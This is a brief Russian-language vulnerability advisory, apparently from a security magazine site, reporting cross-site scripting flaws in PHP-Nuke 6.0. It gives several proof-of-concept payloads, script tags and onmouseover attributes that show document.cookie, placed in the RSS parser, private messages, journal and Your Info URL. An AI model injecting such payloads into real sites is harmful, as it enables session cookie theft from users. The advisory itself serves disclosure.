PHPNuke - портальная система для UNIX и Windows. Уязвимость межсайтового скриптинга обнаружена в нескольких PHPNuke сценариях. Уязвимость позволяет атакующему выполнять произвольный код в контексте уязвимого Web сайта и может использоваться для перехвата опознавательной информации, хранящейся в куки пользователя. Пример: 

RDF/RSS Parser:

<item rdf:about="http://www.somesite.dom"> 
<title><script>alert('cookie: '+ document.cookie)</script></title> 
<link>http://www.somesite.dom/</link> 
<description>Puke It</description> 
</item> 

Private Messages:

<a href="https://xakep.ru/wp-content/uploads/post/16571/X" onmouseover="alert(document.cookie">x</a> - в сообщениях. 

Journal (Risk: critical) 

"<script> alert(document.cookie)</script>" - в любом
месте 

Your Info: 

http://x/"onmouseover="alert(document.cookie) - в URL. 

Уязвимость обнаружена в Francisco Burzi PHP-Nuke 6.0.

Подписаться
Уведомить о
0 комментариев
Межтекстовые Отзывы
Посмотреть все комментарии